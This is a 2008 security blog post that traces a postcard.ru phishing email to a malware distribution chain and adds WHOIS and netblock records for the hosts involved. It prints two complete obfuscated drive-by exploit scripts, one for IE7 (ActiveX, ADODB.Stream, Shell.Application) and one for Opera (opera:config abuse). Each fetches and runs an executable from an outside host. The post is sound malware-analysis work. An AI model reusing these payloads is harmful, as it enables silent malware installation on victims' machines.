Blog for hpHosts, and whatever else I feel like writing about ....

Thursday 2 October 2008

Postcard.ru malware ... and esthost.eu make an appearance

Is it just me, or does this seem familiar? Of course it does, postcard.ru malware has been going around for yonks!.

I received another e-mail today, and I must admit, it's been a while since I've received one of these, but never the less, the e-mail claimed to come from postcard.ru;

Вам пришла виртуальная открытка.
Для ее получения зайдите на сайт <http://www.postcard.ru/card.php?1970893242>
www.postcard.ru/card.php?2718276704 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
и нажмите на ссылку 'получить открытку'

Служба рассылки открыток POSTCARD.RU
------------------------------------------------

You recieved an postcard.
To get it follow to web-site <http://www.postcard.ru/card.php?3765275987>
www.postcard.ru/card.php?3373149370 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
switch to english and click on 'get my postcard'

Postcard service POSTCARD.RU


savichev.com (89.108.94.111, PTR: server5.pwstudio.ru) is the first site we see. This loads an iFrame to twain32.cn;

<iframe name="ABNHosting" src="http://www.twain32.cn/img/out.php?s_id=1&s=card" frameborder="0" border="0" height="1" width="100&q
uot;></iframe>


Ref:
http://vurl.mysteryfcm.co.uk/?url=132594

If you are using IE7 then twain32.cn returns the following;

 <script>
 function CreateO(os, nz)
 {
   var e0 = null;
   try
   {
     eval('e0 = os.CreateObject(nz)')
   }
   catch(e)
   {
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.CreateObject(nz, "")')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.CreateObject(nz, "", "")')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.GetObject("", nz)')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.GetObject(nz, "")')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.GetObject(nz)')
     }
     catch(e)
     {
     }
   }
   return(e0);
 }
 function Download(a)
 {
   var lm = CreateO(a,'m'+'sxm'+'l2'+'.'+'X'+'M'+'LHT'+'TP');
   lm.open('G'+'E'+'T','http://www.yvon-publicidad.com/images/images.php?w=0&e=2',false);
   lm.send();
   var o = CreateO(a,'a'+'d'+'od'+'b'+'.'+'s'+'t'+'re'+'am');
   o.type = 1;
   o.Mode = 3;
   o.open();
   o.Write(lm.responseBody);
   var tut = ".//..//win"+".exe";
   o.savetoFile(tut,2);
   o.close();
   var s = CreateO(a, 'S'+'hel'+'l.A'+'pp'+'lic'+'at'+'ion');
   s.Shellexecute(tut);
 }
 var x = 0;
 var t = new Array(
'{B'+'D'+'96C'+'55'+'6-65'+'A3-11'+'D0'+'-98'+'3A-00'+'C0'+'4FC'+'29'+'E30}',
'{BD'+'96'+'C55'+'6-6'+'5A3-1'+'1D0-9'+'83'+'A-0'+'0C0'+'4F'+'C2'+'9E36}',null);
 while (t[x])
 {
   var a = null;
   if (t[x].substring(0,1) == '{')
     {
       a = document.createElement('object');
       a.setAttribute('cl'+'a'+'ss'+'id', 'cl'+'s'+'id:' + t[x].substring(1, t[x].length + 1));
     }
     else
     {
       try
       {
         a = new ActiveXObject(t[x]);
       }
       catch(e)
       {
       }
     }
     if (a)
     {
       try
       {
         var b = CreateO(a, 'Sh'+'el'+'l'+'.'+'A'+'p'+'pl'+'ica'+'ti'+'on');
         if (b)
         {
           if (Download(a)) break;
         }
       }
       catch(e)
       {
       }
     }
     x++;
   }
   setTimeout("window.location = 'jav.php'", 2500);
   </script>
   </body>
   </html>


If you are using Opera, you get the following;

<script language=javascript>  
blank_iframe = document.createElement('if'+'ra'+'me');  
blank_iframe.src = 'a'+'bo'+'ut:b'+'lank';  
blank_iframe.setAttribute('st'+'yle', 'disp'+'lay:n'+'one');  
blank_iframe.setAttribute('i'+'d', 'bla'+'nk_i'+'fram'+'e_w'+'indow');  
document.appendChild(blank_iframe);  
blank_iframe_window.eval  
   ("config_iframe = document.createElement('if'+'ra'+'me');\  
   config_iframe.setAttribute('i'+'d', 'con'+'fig_if'+'rame_w'+'indow');\  
   config_iframe.src = 'op'+'era:c'+'on'+'fig';\  
    document.appendChild(config_iframe);\  
    app_iframe = document.createElement('sc'+'ri'+'pt');\  
    cache_iframe = document.createElement('if'+'ra'+'me');\  
    app_iframe.src = 'http://www.yvon-publicidad.com/images/images.php?w=0&e=2';\  
    app_iframe.onload = function ()\  
    {\  
        cache_iframe.src = 'op'+'er'+'a:c'+'ache';\  
        cache_iframe.onload = function ()\  
        {\  
            cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\  
            var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe
            .src.toUpperCase(), '');\ 
            filename = cache.match(re);\  
            config_iframe_window.eval\  
            (\"\  
            opera.setPreference('Ne'+'tw'+'or'+'k','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\  
            app_link = document.createElement('a');\  
            app_link.setAttribute('h'+'r'+'ef', 't'+'n3'+'270://n'+'oth'+'ing');\  
            app_link.click();\  
            setTimeout(function () {opera.setPreference('Ne'+'tw'+'ork','TN'+'327'+'0 A'+'pp','te'+'ln'+'et.'+'exe')},1000);\  
            \");\  
        };\  
        document.appendChild(cache_iframe);\  
    };\  
    document.appendChild(app_iframe);");  
</script>  
</body>  
</html>


Ref:
http://vurl.mysteryfcm.co.uk/?url=132605

twain32.cn resolves to the IP 195.5.116.239, which has a PTR that shows: src.esthost.eu (IP: 195.5.116.239). Alas Whois.eu don't seem to want to allow us to do a remote WhoIs, so we've got to eurid.eu. No problem. When doing a WhoIs lookup on esthost.eu, we see;

Domain
Name esthost
Status REGISTERED
Registered April 7, 2006
Last update October 18, 2007, 12:48 pm

Registrant
Name Viktor Norin
Organisation Starline Web Services
Language English
Address
    PAE 21
    11415 Tallinn
    EE
    Estonia
Phone +372.6370911
Fax +372.6370911
Email hostmaster@esthost.eu

Registrar technical contacts
Name Domain Manager
Organisation PublicDomainRegistry.com
Language English
Address
    14525 SW Millikan #48732
    97005-2343 Beaverton
    Oregon
    United States
Phone +1.2013775952
Fax +1.320.2105146
Email domain.manager@publicdomainregistry.com

Registrar
Organisation PublicDomainRegistry.com
Website www.publicdomainregistry.com

Nameservers
ns2.esthost.eu (195.5.117.233)
ns1.esthost.eu (195.5.116.233)


Net-block information:

inetnum: 195.5.116.0 - 195.5.117.255
netname: EE-COMPIC
descr: Compic Ltd.
country: EE
org: ORG-CL48-RIPE
admin-c: RI215-RIPE
tech-c: RI215-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: AS3327-MNT
mnt-routes: AS3327-MNT
mnt-domains: AS3327-MNT
source: RIPE # Filtered

organisation: ORG-CL48-RIPE
org-name: Compic Ltd.
org-type: OTHER
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
phone: +372 6321028
e-mail: roman@compic.ee
admin-c: RI215-RIPE
mnt-ref: AS3327-MNT
mnt-by: AS3327-MNT
source: RIPE # Filtered

person: Roman Ivanov
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
mnt-by: AS39823-MNT
phone: +3726321028
e-mail: roman@compic.ee
nic-hdl: RI215-RIPE
source: RIPE # Filtered

% Information related to '195.5.116.0/23AS39823'

route: 195.5.116.0/23
descr: Compic Ltd.
origin: AS39823
mnt-by: AS3327-MNT
source: RIPE # Filtered


Getting back to the infection however. This comes courtesy of yvon-publicidad.com, as you can see in the above source code;

http://www.yvon-publicidad.com/images/images.php?w=0&e=2

This drops a 1.95K file called mstelnet.exe (FSG packed), which Avira flagged as;



This, according to ThreatExpert, downloads the following;

http://www.yvon-publicidad.com/images/images.php?w=1 (7.12K - HIDDENEXT/Crypted)
http://www.yvon-publicidad.com/images/images.php?w=2 (45K - TR/Crypt.Morphine.Gen)
http://www.yvon-publicidad.com/images/images.php?w=3 (45K - TR/Crypt.Morphine.Gen)
http://www.yvon-publicidad.com/images/images.php?w=4 (27K - TR/Crypt.Morphine.Gen)

Ref:
http://www.threatexpert.com/report.aspx?md5=cbec5204eddd57aadc4b09d6d1a0a003

The report makes for very interesting reading as it shows an injection into the IE process (injects mswapi.dll), trojans and keyloggers - oh the fun!.

WhoIs for the domain shows;

Registrant:
Guillain Jean-Daniel
21, rue des vertus
Marseille, 13005
France

Registrar: DOTREGISTRAR
Domain Name: YVON-PUBLICIDAD.COM
Created on: 20-MAY-05
Expires on: 20-MAY-09
Last Updated on: 06-APR-08


A little searching turned up a couple of other possibly related (previous versions?) reports;

http://www.threatexpert.com/report.aspx?uid=d0ce4715-e6e2-4a3e-b4e0-69a2fb7698cb

http://research.sunbelt-software.com/ViewMalware.aspx?id=2787949

No comments: